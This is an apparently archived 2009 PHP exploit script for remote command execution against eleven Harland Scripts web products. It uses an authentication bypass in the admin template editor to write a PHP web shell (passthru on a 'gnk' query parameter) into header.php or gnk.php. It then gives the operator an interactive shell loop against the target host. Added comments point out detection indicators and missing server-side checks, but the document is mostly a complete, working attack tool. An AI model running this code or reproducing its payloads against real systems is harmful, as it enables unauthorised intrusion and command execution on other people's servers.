
# Title : Harland Scripts 11 Products Remote Command Execution Exploit
# Published : 2009-05-15
# Author : G4N0K


<?php
//786
/*
==============================================================================
                      _      _       _          _      _   _ 
                     /     | |     | |        /     | | | |
                    / _    | |     | |       / _    | |_| |
                   / ___   | |___  | |___   / ___   |  _  |
   IN THE NAME OF /_/   _ |_____| |_____| /_/   _ |_| |_|
                                                             

==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   |  | |  / _   | |/ /
                    | |  _  | || |_  |  | | | | | | | ' / 
                    | |_| | |__   _| | |  | | |_| | | .  
                     ____|    |_|   |_| _|  ___/  |_|_...FROM IRAN

==============================================================================
	Harland Scripts 11 Products Remote Command Execution Exploit
==============================================================================

	[?a] Script:.............[ Harland Scripts 11 Products ]...............
	[?a] Website:............[ http://harlandscripts.com(!) ]..............
	[?a] Today:..............[ 1005009  ]..................................
	[?a] Founder:............[ G4N0K | mail[.]ganok[sh!t]gmail.com ].......




	 [+] What's going on
	======================================
       [0] Auth bypass...
       [1] PHP-Code Injection...


	 [+] Vulnerable Scripts
	======================================
       1 - Traffic Click 4 Cash Script
       2 - Get A Date Script
       3 - Birthsake Keepsake
       4 - FFA
       5 - TShirt Rental Script
       6 - Mug Rental script
       7 - Top Hits
       8 - Recipe 6.0
       9 - Link Lister Traffic System
      10 - Link Back Checker Service Script
      11 - AD PHP Script


	 [+] SQLi & AFU
	======================================
	 Some of these scripts are also vulnerable to "SQLi" and "Arbitrary File Upload(Auth bypass)"...


*/
// All PHP diagnostics are switched off for the rest of the run, so warnings
// raised further down (for example from undefined variables) are never shown.
error_reporting(0);

// The script only runs under the CLI SAPI; any other SAPI stops here.
if (php_sapi_name() != "cli") {
	die("WTF, Run Me From CommandLine...");
}

// Exactly three positional arguments are required (argv[0] is the script itself).
// Anything else prints the banner and the usage text, then stops.
if ($argc != 4) {
	__nfo();
	__usg();
	exit;
}

// argv[1] = host, argv[2] = base path on that host, argv[3] = product number.
// None of the three is validated here; they are used verbatim further down.
list(, $hst, $pth, $prd) = $argv;

/**
 * Write the tool's fixed banner (title, author, credits) to standard output.
 *
 * Takes no arguments and returns nothing; the text is a constant heredoc.
 */
function __nfo()
{
	echo <<<EOL
	
        +-------------------------------------------------------------+
        | Harland Scripts Multiple Products Command Execution Exploit |
        |              by: G4N0K | mail[o]ganok[ta]com                |
        |          Thanks: ALLAH, MSD, SMN, AMD, AFN, Str0ke          |
        +-------------------------------------------------------------+
rn
EOL;
}

/**
 * Write the usage text to standard output: the expected argument order
 * (host, path, product number), one sample invocation, and the table that
 * maps product numbers 1-11 to the affected script names.
 *
 * Takes no arguments and returns nothing.
 */
function __usg()
{
	$usage = <<<GNK
        uasge...:
	
		  xpl.php [host] [path] [product-number]
		  xpl.php 127.0.0.1 /FFA/ 4
		
		  
          Product Numbers:
          =========================================
          1 - Traffic Click 4 Cash Script
          2 - Get A Date Script
          3 - Birthsake Keepsake
          4 - FFA
          5 - TShirt Rental Script
          6 - Mug Rental script
          7 - Top Hits
          8 - Recipe 6.0
          9 - Link Lister Traffic System
         10 - Link Back Checker Service Script
         11 - AD PHP Script
		 
GNK;
	print $usage;
}

/**
 * Open a TCP connection to $hst, write $pkt to it unchanged, and return
 * everything the peer sends back until it closes the connection.
 *
 * @param string $hst Host handed straight to fsockopen(); no validation is done here.
 * @param string $pkt Pre-built request text written to the socket as-is.
 * @return mixed The concatenated lines read from the socket; on a connect
 *               failure the function prints the error and terminates the script instead.
 */
function __snd($hst, $pkt)
{
	// Port 80 and a 30-second connect timeout are hard-coded, so traffic from
	// this tool is plain-text HTTP and visible to any inline inspection.
	$socket = fsockopen($hst, 80, $errno, $errstr, 30);
	// NOTE(review): $ggg is initialised but never read; the accumulator used
	// below is $g4n0k, which is never initialised in this function.
	$ggg='';
	if (!$socket) {
		// A failed connect ends the whole script, not just this call.
		echo "rn    [+] Socket err#: $errstr ($errno)nr";exit;
	} else {
		fwrite($socket, $pkt);
		// Read until EOF in chunks of at most 2047 bytes per fgets() call;
		// no read timeout or size cap is applied to the response.
		while (!feof($socket)) {
			$g4n0k.=fgets($socket, 2048);
		}
		fclose($socket);
		return $g4n0k;
	}
}

/**
 * Return the part of $wt that lies between the first and the last occurrence
 * of the fixed marker "gnkgnkgnk".
 *
 * The marker is a constant nine-character string that the injected page
 * prints around its output, which makes it a stable indicator to search for
 * in HTTP responses and in files under the web root.
 *
 * When both lookups are falsy (not found, or found at offset 0) an error line
 * is printed, but the function still carries on and returns whatever substr()
 * yields for those offsets.
 *
 * @param string $wt Response text to search.
 * @return mixed Result of substr() over the span between the two markers.
 */
function __srch($wt)
{
	$marker = 'gnkgnkgnk';
	$first = strpos($wt, $marker);
	$last = strrpos($wt, $marker);

	if (!($first || $last)) {
		echo " [!] error...rn";
	}

	// 9 is the length of the marker: skip past the opening one.
	$start = $first + 9;
	return substr($wt, $start, $last - $start);
}

	// Default form body for the template editor's save action. `fname` names
	// the file the editor should write (a relative path that climbs one level
	// with "../") and `art` carries URL-encoded PHP that prints the marker
	// gnkgnkgnk, passes the `gnk` query parameter to passthru(), and prints the
	// marker again.
	// Defensive reading: the request carries no cookie or credential, so the
	// editor endpoint has to authenticate the caller itself, confine `fname`
	// to an allow-list of template names, and never store executable PHP.
	$joke = "act=save&fname=..%2Ftpl%2Fheader.php&art=%3C%3Fphp+error_reporting%280%29%3Bprint%28%22gnkgnkgnk%22%29%3Bpassthru%28%24_GET%5B%22gnk%22%5D%29%3Bprint%28%22gnkgnkgnk%22%29%3B+%3F%3E";
	
	__nfo();

		// Per-product layout. $pth0 is the editor script that receives the POST,
		// $pth1 is the file requested afterwards with GET. Products 1-7 keep the
		// default body above; products 8-11 replace it with one whose `fname`
		// is gnk.php (or backup/gnk.php for product 9).
		// Useful as indicators when reviewing logs or web roots: POSTs with
		// act=save to the template.php paths below, and files named gnk.php in
		// the listed admin directories.
		if ($prd == 1 || $prd == 2 || $prd == 3 || $prd == 4)
		{
			$pth0 = "admin/template.php";
			$pth1 = "tpl/header.php";
		}
		  elseif ($prd == 5 || $prd == 6)
		{
			$pth0 = "admin/template.php";
			$pth1 = "templates/header.php";
		}
		  elseif ($prd == 7)
		{
			$pth0 = "admin/template.php";
			$pth1 = "template/header.php";
			
		} elseif ($prd == 8)
		{
			$pth0 = "admin2/template.php";
			$pth1 = "admin2/gnk.php";
			$joke = "act=save&fname=gnk.php&art=%3C%3Fphp+error_reporting%280%29%3Bprint%28%22gnkgnkgnk%22%29%3Bpassthru%28%24_GET%5B%22gnk%22%5D%29%3Bprint%28%22gnkgnkgnk%22%29%3B+%3F%3E";
			
		} elseif ($prd == 9)
		{
			$pth0 = "admin/template.php";
			$pth1 = "admin/backup/gnk.php";
			$joke = "act=save&fname=backup%2Fgnk.php&art=%3C%3Fphp+error_reporting%280%29%3Bprint%28%22gnkgnkgnk%22%29%3Bpassthru%28%24_GET%5B%22gnk%22%5D%29%3Bprint%28%22gnkgnkgnk%22%29%3B+%3F%3E";
			
		} elseif ($prd == 10)
		{
			$pth0 = "admincontrol/template.php";
			$pth1 = "admincontrol/gnk.php";
			$joke = "act=save&fname=gnk.php&art=%3C%3Fphp+error_reporting%280%29%3Bprint%28%22gnkgnkgnk%22%29%3Bpassthru%28%24_GET%5B%22gnk%22%5D%29%3Bprint%28%22gnkgnkgnk%22%29%3B+%3F%3E";
			
		} elseif ($prd == 11)
		{
			$pth0 = "template.php";
			$pth1 = "gnk.php";
			$joke = "act=save&fname=gnk.php&art=%3C%3Fphp+error_reporting%280%29%3Bprint%28%22gnkgnkgnk%22%29%3Bpassthru%28%24_GET%5B%22gnk%22%5D%29%3Bprint%28%22gnkgnkgnk%22%29%3B+%3F%3E";
			
		} else 
		{
			// Any product number outside 1-11 prints the usage text and stops.
			__usg();
			exit;
		}

	// Request text for the save action: user-supplied base path + editor
	// script, the host header, and the form body chosen above. $pth and $hst
	// are concatenated in without any checking.
	$msd_pyld  = "POST {$pth}{$pth0} HTTP/1.1rn";
	$msd_pyld .= "Host: {$hst}rn";
	$msd_pyld .= "Keep-Alive: 300nr";
	$msd_pyld .= "Connection: keep-alivern";
	$msd_pyld .= "Content-Length: ".strlen($joke)."rn";
	$msd_pyld .= "Content-Type: application/x-www-form-urlencodedrnrn";
	$msd_pyld .= $joke;


	echo "rn  [+] Trying to exploit {$hst}...";

	// Follow-up request text that fetches the file named by $pth1.
	$amd_pyld  = "GET {$pth}{$pth1} HTTP/1.1rn";
	$amd_pyld .= "Host: {$hst}rn";
	$amd_pyld .= "Connection: closenrnr";

	// Both requests are sent from inside the condition, POST first. The
	// attempt counts as successful when the POST response does not contain
	// "permission" (case-insensitive) and the GET response contains "gnk".
	// If the first test fails, the short-circuit means the GET is never sent.
	if (!stristr(__snd($hst, $msd_pyld), "permission") && stristr(__snd($hst, $amd_pyld), "gnk"))
	{
		echo "rn  [+] PHP-Code has been injected...";
		echo "rn  [+] Now you can exec your commands...rn";} else {
		echo "rn  [+] Oops!, Code injection failed.rn"; exit;
	}

// Interactive loop: one line is read from STDIN per iteration, "exit" ends the
// script, and anything else is placed in the `gnk` query parameter of a GET to
// $pth1. Only spaces are rewritten (to %20); no other encoding is applied.
// On the server side this shows up in access logs as repeated GET requests to
// the same file with a `gnk=` query string, each from a fresh connection.
while(1)
{
	echo "rnphp-shell@{$hst}# ";
	if (($cmd = str_replace (" ", "%20", trim(fgets(STDIN)))) == "exit") exit;
	$smn_pyld  = "GET {$pth}{$pth1}?gnk=".$cmd." HTTP/1.1rn";
	$smn_pyld .= "Host: {$hst}rn";
	$smn_pyld .= "Connection: closenrnr";
	// Only the text between the two gnkgnkgnk markers in the response is shown.
	print __srch(__snd($hst, $smn_pyld));
}

?>
